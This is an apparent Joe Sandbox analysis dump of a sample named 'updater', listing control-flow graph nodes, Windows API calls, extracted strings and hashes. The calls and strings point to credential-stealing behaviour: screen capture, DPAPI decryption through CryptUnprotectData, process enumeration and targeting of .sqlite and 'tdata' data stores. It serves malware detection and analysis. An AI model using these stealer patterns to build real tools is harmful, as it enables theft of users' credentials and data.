13f6353-13f635b GetLastError 4189->4193 4190->4191 4194 13f6331-13f6351 4190->4194 4195 13f638a-13f63ad 4191->4195 4196 13f63d0-13f63d2 4191->4196 4197 13f6472-13f647a 4192->4197 4198 13f64c1-13f64c3 4192->4198 4193->4182 4194->4193 4214 13f6360-13f6383 4194->4214 4195->4193 4212 13f63af-13f63cd 4195->4212 4199 13f6417-13f6419 4196->4199 4200 13f63d4-13f63f0 4196->4200 4203 13f647c-13f649c FindFirstFileExW 4197->4203 4204 13f64ba 4197->4204 4201 13f641b-13f641d 4198->4201 4202 13f64c9-13f64cb 4198->4202 4199->4189 4199->4201 4200->4193 4215 13f63f6-13f6414 4200->4215 4201->4182 4202->4182 4203->4193 4208 13f64a2-13f64b8 FindClose 4203->4208 4205 13f64be 4204->4205 4205->4198 4208->4205 4212->4196 4214->4191 4215->4199
                                    APIs
                                    • GetLongPathNameW.KERNEL32(?,00000000,?), ref: 013F6277
                                    • GetLastError.KERNEL32 ref: 013F6281
                                    • ___std_fs_open_handle@16.LIBCPMT ref: 013F62E9
                                    • GetLastError.KERNEL32 ref: 013F6353
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$LongNamePath___std_fs_open_handle@16
                                    • String ID: GetFileInformationByHandleEx$kernel32.dll
                                    • API String ID: 2391694696-1782754588
                                    • Opcode ID: 28b5d85ac4544d9503d695ab65bfd907e27e77257a8f35d77de27785433e1f0f
                                    • Instruction ID: 7288ceec6ef98d22fd730936b3ce994690b846a471713d4be241f7046fe1da3a
                                    • Opcode Fuzzy Hash: 28b5d85ac4544d9503d695ab65bfd907e27e77257a8f35d77de27785433e1f0f
                                    • Instruction Fuzzy Hash: 27A19EB59002199FEB24CF28C945BA9BBF4EF05328F1442ADEE65E7391E770D941CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                    • KiUserCallbackDispatcher.NTDLL ref: 013CB8AB
                                    • GetSystemMetrics.USER32 ref: 013CB8B4
                                    • GetDC.USER32(00000000), ref: 013CB8BB
                                    • SelectObject.GDI32(00000000,00000000), ref: 013CB8E5
                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 013CB8FE
                                      • Part of subcall function 013B4619: InitializeCriticalSectionEx.KERNEL32(01454D88,00000000,00000000,?,013B471E,?,?,013B46CC), ref: 013B465C
                                      • Part of subcall function 013B4619: GetLastError.KERNEL32(?,013B471E,?,?,013B46CC), ref: 013B4666
                                    • EnterCriticalSection.KERNEL32(00000004), ref: 013CB937
                                    • LeaveCriticalSection.KERNEL32(00000004), ref: 013CB941
                                      • Part of subcall function 013B4BCB: GetObjectA.GDI32(?,00000054,?), ref: 013B4BDF
                                    • DeleteDC.GDI32(?), ref: 013CB96F
                                    • DeleteObject.GDI32(00000000), ref: 013CB976
                                    • ReleaseDC.USER32(00000000,?), ref: 013CB981
                                      • Part of subcall function 013B46E3: DeleteObject.GDI32(?), ref: 013B4711
                                      • Part of subcall function 013B46E3: EnterCriticalSection.KERNEL32(00000004,?,?,013B46CC), ref: 013B4724
                                      • Part of subcall function 013B46E3: LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013B46CC), ref: 013B4738
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$Object$Delete$EnterLeave$CallbackDeallocateDispatcherErrorInitializeLastMetricsReleaseSelectSystemUser
                                    • String ID:
                                    • API String ID: 1025157159-0
                                    • Opcode ID: 37a7f6b75709e0cd4a7803369f7390360468869e65d9d2b1c79ee48ae838779f
                                    • Instruction ID: 460aa769659c0512a88f4a955c396e115b91f01250ff7d18c0c3325fd5bca471
                                    • Opcode Fuzzy Hash: 37a7f6b75709e0cd4a7803369f7390360468869e65d9d2b1c79ee48ae838779f
                                    • Instruction Fuzzy Hash: 6E51AF71D0025AEFEB14EBA4DD44BEEBBB8EF24304F10419AE509A7191EB705E45CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4260 13b7d35-13b7d4a 4261 13b7d4c-13b7d51 4260->4261 4262 13b7d56-13b7d5a 4260->4262 4263 13b7fbf-13b7fc5 4261->4263 4264 13b7d5c-13b7d61 4262->4264 4265 13b7d66-13b7d8e call 1412d00 4262->4265 4264->4263 4268 13b7d9a 4265->4268 4269 13b7d90-13b7d95 4265->4269 4270 13b7da1-13b7da4 4268->4270 4269->4263 4271 13b7da9-13b7dae 4270->4271 4272 13b7da6 4270->4272 4271->4270 4273 13b7db0-13b7dd6 call 13b740e call 13b799d 4271->4273 4272->4271 4273->4263 4278 13b7ddc-13b7e7f call 1412d00 * 2 _strlen call 1412d00 4273->4278 4285 13b7e89-13b7e9c 4278->4285 4286 13b7e81-13b7e84 4278->4286 4287 13b7eae-13b7eb1 4285->4287 4288 13b7e9e-13b7ea3 4285->4288 4286->4285 4290 13b7eb5-13b7fb1 call 140f730 call 13b69f6 4287->4290 4288->4287 4289 13b7ea5-13b7eac 4288->4289 4289->4290 4295 13b7fc8-13b7fda 4290->4295 4296 13b7fb3-13b7fb5 call 13b7be2 4290->4296 4298 13b7fe8-13b8001 4295->4298 4299 13b7fdc-13b7fe6 call 13b7be2 4295->4299 4300 13b7fba 4296->4300 4302 13b8003-13b8007 4298->4302 4303 13b8016-13b801d 4298->4303 4299->4263 4300->4263 4302->4303 4307 13b8009-13b8014 call 13b73a6 4302->4307 4304 13b801f-13b8035 GetDesktopWindow GetTickCount call 1412ceb 4303->4304 4305 13b8036 4303->4305 4304->4305 4309 13b8038-13b8048 call 1412cca 4305->4309 4307->4302 4307->4303 4315 13b804a-13b8053 4309->4315 4316 13b8057-13b806b call 13b73ed 4315->4316 4319 13b806d-13b8071 4316->4319 4320 13b8073-13b8085 call 13b7813 4319->4320 4321 13b8087-13b809d 4319->4321 4320->4321 4322 13b809f-13b80a6 call 13b7c23 4321->4322 4323 13b80b1-13b80b3 4321->4323 4330 13b80ab-13b80af 4322->4330 4326 13b8108-13b8125 call 13b7be2 4323->4326 4327 13b80b5-13b80be 4323->4327 4326->4263 4334 13b812b-13b8130 4326->4334 4331 13b80e0-13b80f3 call 13b7b49 4327->4331 4330->4326 4337 13b80c0-13b80c3 4331->4337 4338 13b80f5-13b80fe 4331->4338 4334->4300 4336 13b8136-13b8155 4334->4336 4339 13b81cb-13b81d4 4336->4339 4340 13b8157-13b815a 4336->4340 4337->4338 4341 13b80c5-13b80d6 call 13b7813 4337->4341 4342 13b8104 4338->4342 4343 13b827b-13b8280 4339->4343 4344 13b81da-13b81dc 4339->4344 4340->4339 4345 13b815c-13b816c 4340->4345 4354 13b81be-13b81c6 4341->4354 4355 13b80dc 4341->4355 4342->4326 4343->4263 4347 13b81de-13b81e0 4344->4347 4348 13b81e6-13b81f3 call 13b6c5d 4344->4348 4349 13b817b-13b8191 call 13b78e2 4345->4349 4350 13b816e-13b8176 4345->4350 4347->4343 4347->4348 4348->4300 4358 13b81f9-13b8202 4348->4358 4359 13b8193-13b81a0 call 13b69f6 4349->4359 4360 13b81b4-13b81b9 4349->4360 4350->4349 4354->4342 4355->4331 4361 13b8207-13b820c 4358->4361 4359->4300 4366 13b81a6-13b81b2 call 13b78e2 4359->4366 4360->4263 4361->4263 4363 13b8212-13b825b call 140e00b call 140f730 call 140dc67 call 140f730 4361->4363 4376 13b825d-13b8260 4363->4376 4377 13b8264-13b826c 4363->4377 4366->4360 4366->4361 4378 13b8274-13b8276 4376->4378 4379 13b826e 4377->4379 4380 13b8262 4377->4380 4378->4263 4379->4378 4380->4377
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 013B801F
                                    • GetTickCount.KERNEL32(?,?,014443AB), ref: 013B8027
                                      • Part of subcall function 013B7BE2: CloseHandle.KERNEL32(00000000), ref: 013B7BF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCountDesktopHandleTickWindow
                                    • String ID: UT
                                    • API String ID: 3281157955-894488996
                                    • Opcode ID: f3a115c0926e2665874182787a0273d6d09f36eb459b632ef3768c90ec86d2ee
                                    • Instruction ID: 8c24dfa083432f483a8127446a467964c1a5d89a614646e7ac17e1909e5ddc54
                                    • Opcode Fuzzy Hash: f3a115c0926e2665874182787a0273d6d09f36eb459b632ef3768c90ec86d2ee
                                    • Instruction Fuzzy Hash: 54F19C716087429FD715DF69C4C0BAABBE8FF95308F14482EE68587B91E730E548CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                    • String ID: (size: $.$.$.sqlite$@$M$ZO$bAIG$jOZO$mAAEGK].
                                    • API String ID: 4060657020-1872904414
                                    • Opcode ID: d374834100c3f7a0db308518d1bce99c47189d86b2df29fdaeb3c3942dff2539
                                    • Instruction ID: 6179b1d6e8b865af6b49c0ff3ff91336b6f2f54b3abd6198f731286c9d8d545b
                                    • Opcode Fuzzy Hash: d374834100c3f7a0db308518d1bce99c47189d86b2df29fdaeb3c3942dff2539
                                    • Instruction Fuzzy Hash: 6EB28C71C0029ADEDF15EBA8C850BEDBBB5AF24708F1041AED40967291EB345F49CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$@HGI$@r$B$]]H@$rMA@HGI.$}ZKO$}ZKOC~OZF.
                                    • API String ID: 2013694253-3658648673
                                    • Opcode ID: 38189a4a00d9cd512ebaf81c8f80bf64fc03bc81e39adb812ca2389dbdd7e90f
                                    • Instruction ID: 958a383dfc563bf79e5626ab1e86517f776e2096d775a58a2b81666df1a0b2c3
                                    • Opcode Fuzzy Hash: 38189a4a00d9cd512ebaf81c8f80bf64fc03bc81e39adb812ca2389dbdd7e90f
                                    • Instruction Fuzzy Hash: 3192C070C04299DEDB15EBA8C894BEDBB75BF24308F1441EED5096B291EB701E89CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: #$)\tdata\$.$.$\tdata\$m.$map$zKBKI\OC
                                    • API String ID: 2013694253-2410336440
                                    • Opcode ID: 248abbb76e026394b359b154f67a269d84c348536b2ad96bd50033fe6f15d622
                                    • Instruction ID: 0879b669a3f5dce48b426d3f477d8b527a6ea44dcf998768b699e5b95c8ff028
                                    • Opcode Fuzzy Hash: 248abbb76e026394b359b154f67a269d84c348536b2ad96bd50033fe6f15d622
                                    • Instruction Fuzzy Hash: F0429230D0025ACBDB25EBA8C894BEDFBB4BF65304F1041AED54967291EB705E89CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0143E0E8), ref: 01423C5E
                                    • _free.LIBCMT ref: 01423C4C
                                      • Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
                                      • Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B
                                    • _free.LIBCMT ref: 01423E18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                    • String ID: Pacific Daylight Time$Pacific Standard Time
                                    • API String ID: 2155170405-1154798116
                                    • Opcode ID: c6dc522801133445de4eba6d179d41830c22bafd81a823d7e20fa31cdd31121f
                                    • Instruction ID: 22c1e20fcd55f2c61813afed7fdf853581b6baed344a58a62c704b36ace36dc2
                                    • Opcode Fuzzy Hash: c6dc522801133445de4eba6d179d41830c22bafd81a823d7e20fa31cdd31121f
                                    • Instruction Fuzzy Hash: 7F511B71900225ABDB20DF6ADC809AA7BB8FF64310F54016FE550972B5E7749DC1CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$.txt$PlayerName$r.${]K\]r${}k|jozo
                                    • API String ID: 2013694253-2290431626
                                    • Opcode ID: e50e0f88b7c904e1a74d5aefd1a95a830d8d2c5daddcd921700074f173f557ce
                                    • Instruction ID: f21cd91fb574ac7959d9620c4ab45b3d998ab48a1a8eb003a1ce7be05217c3eb
                                    • Opcode Fuzzy Hash: e50e0f88b7c904e1a74d5aefd1a95a830d8d2c5daddcd921700074f173f557ce
                                    • Instruction Fuzzy Hash: 60223130D04286CECB15EFE8D445AEDFBB0AF25718F24006ED4506F2A6DB746E89CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindClose.KERNEL32(000000FF,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6113
                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,013F6136,?), ref: 013F6143
                                    • GetLastError.KERNEL32(?,?,?,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6150
                                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,013F6136,?,?,?,?,013B2C64), ref: 013F616A
                                    • GetLastError.KERNEL32(?,?,?,?,013F6136,?,?,?,?,013B2C64,?,?,?,?), ref: 013F6177
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$ErrorFileFirstLast$Close
                                    • String ID:
                                    • API String ID: 569926201-0
                                    • Opcode ID: b040c22e628349f7ab753a893e3abcacf8ff95e22af7efee5a04fd67299b6cdf
                                    • Instruction ID: 03c61bf9dd29e3b4e03a05dcd1ff9edcd3b1b827688495a37e7a91a7321e7190
                                    • Opcode Fuzzy Hash: b040c22e628349f7ab753a893e3abcacf8ff95e22af7efee5a04fd67299b6cdf
                                    • Instruction Fuzzy Hash: 460140B2100149BBDB301F7ADC4DC5B7F79EB92765B10461DF7A5811A6C6318451D760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0141277F,?,?,?,?,?,01413E8D), ref: 014127A2
                                    • TerminateProcess.KERNEL32(00000000,?,0141277F,?,?,?,?,?,01413E8D), ref: 014127A9
                                    • ExitProcess.KERNEL32 ref: 014127BB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 53a1f74bdac4baae3ea83f2c3bb3650fd614804e4f7df7500f5659d621861a29
                                    • Instruction ID: 8c6a5c8e7ab50a12d54a4e9e7cfaba9d0308338991c75d2e4bf328e66402a73c
                                    • Opcode Fuzzy Hash: 53a1f74bdac4baae3ea83f2c3bb3650fd614804e4f7df7500f5659d621861a29
                                    • Instruction Fuzzy Hash: 45E08675000108AFCF216F69D848D4E3F79FB54652B144415F968C6239CB75D881DB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CryptUnprotectData.CRYPT32(Jx~`.,00000000,00000000,00000000,00000000,00000000,?,?,-00000046,00000000), ref: 013C273D
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CryptDataDeallocateUnprotect
                                    • String ID: r`A\Jx~`.
                                    • API String ID: 174072602-705364654
                                    • Opcode ID: a5d6553fee9935b6bb1b99d3a79e21aa9c49767fd1fd137e609e8b14a196b6d5
                                    • Instruction ID: 92dd00ca579d02245957e75fef81d7cf4969b635b0ab76bcc2837303118ca2e1
                                    • Opcode Fuzzy Hash: a5d6553fee9935b6bb1b99d3a79e21aa9c49767fd1fd137e609e8b14a196b6d5
                                    • Instruction Fuzzy Hash: 39113D75D0020AAFDB15DFA9D4909EEFBB4FF58A04F00416EF411A3250DB745A08CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Process32Next.KERNEL32(?,00000128,?,?,?), ref: 013C66E6
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000001,00000000), ref: 013C65DE
                                      • Part of subcall function 013CDF41: _Deallocate.LIBCONCRT ref: 013CDF50
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDeallocateNextProcess32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2624477505-0
                                    • Opcode ID: ef1ae940a04ab088acd7122431d0ab7c73d55e986fbbd6df1e65d39c11032b17
                                    • Instruction ID: 961ea2926e0be95a23e755e9edeba013d4125df1393b300d391915576b38aacd
                                    • Opcode Fuzzy Hash: ef1ae940a04ab088acd7122431d0ab7c73d55e986fbbd6df1e65d39c11032b17
                                    • Instruction Fuzzy Hash: 445129B1D0020A9FDF10DF99C980AEEBBB9FF58704F14416EE415A7251DB70AE45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 0140E5B3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: ad328f8696725e402774c48f70003e2b97f100a1e37c4a2168a9b716593e854d
                                    • Instruction ID: 674a323dbc5847ee12423c41d351f9fc01bb4ed2a903e33e2de0308fea727abe
                                    • Opcode Fuzzy Hash: ad328f8696725e402774c48f70003e2b97f100a1e37c4a2168a9b716593e854d
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • GetSystemTimePreciseAsFileTime, xrefs: 0141FDB7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: GetSystemTimePreciseAsFileTime
                                    • API String ID: 0-595813830
                                    • Opcode ID: 1d8e5a0ffde01adba27a27149a9c663e1099340d28fa22174e63e1e9cfd94077
                                    • Instruction ID: 2114c3792fab0696f58ae52f9c103397f74f34311f0b8769a075d173e434377a
                                    • Opcode Fuzzy Hash: 1d8e5a0ffde01adba27a27149a9c663e1099340d28fa22174e63e1e9cfd94077
                                    • Instruction Fuzzy Hash: C1E0C233AC422973C32422D66C06EAABA4ACB90AF3F540167FE08562349976081683D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                    • Instruction ID: 1c71f8f9a0e80bc64da85cfa4827aa91159f4fe472c61f07d78ed7baf935d177
                                    • Opcode Fuzzy Hash: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                    • Instruction Fuzzy Hash: 00E04672912238EBCB14DB89990498AF7ECEB45A00B55009AFA01D3220C6B4DE84C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
